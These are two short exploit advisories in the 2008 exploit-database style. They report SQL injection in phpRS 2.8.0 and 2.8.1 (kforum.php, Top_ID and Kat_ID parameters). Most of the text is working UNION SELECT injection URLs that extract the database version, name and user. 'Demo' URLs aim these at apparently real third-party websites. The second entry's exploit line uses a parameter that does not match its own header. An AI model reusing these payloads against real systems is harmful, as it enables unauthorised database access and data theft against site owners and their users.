[~] phpRS Version 2.8.0 (kforum.php?akce=topic&Top_ID) - SQL Injection Vulnerability
[~]
[~] http://www.supersvet.cz/phprs/
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 12.09.2008
[~]
[~]
[~] d3v1l@spoofer.com  http://security-sh3ll.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~] 
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~] 
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/kforum.php?akce=topic&Top_ID=-1' UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4/* 
[~]   
[~] Demo :-
[~]
[~] http://vsetaty-privory.eu/phprs/kforum.php?akce=topic&Top_ID=-1' UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4/*
[~] 
[~] Now need to look at source page to view the result
[~]          
[~]----------------------------------------------------------------------------------------------------------------------
 



[~] phpRS Version 2.8.1 (kforum.php?akce=kateg&Kat_ID=) - SQL Injection Vulnerability
[~]
[~] http://www.supersvet.cz/phprs/
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 12.09.2008
[~]
[~]
[~] d3v1l@spoofer.com  http://security-sh3ll.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~] 
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~] 
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/kforum.php?akce=topic&Top_ID=-1' UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/* 
[~]   
[~] Demo :-
[~]
[~] http://konstruktiva.kuzelky.cz/kforum.php?akce=kateg&Kat_ID=-1' UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/*
[~] 
[~] 
[~]          
[~]----------------------------------------------------------------------------------------------------------------------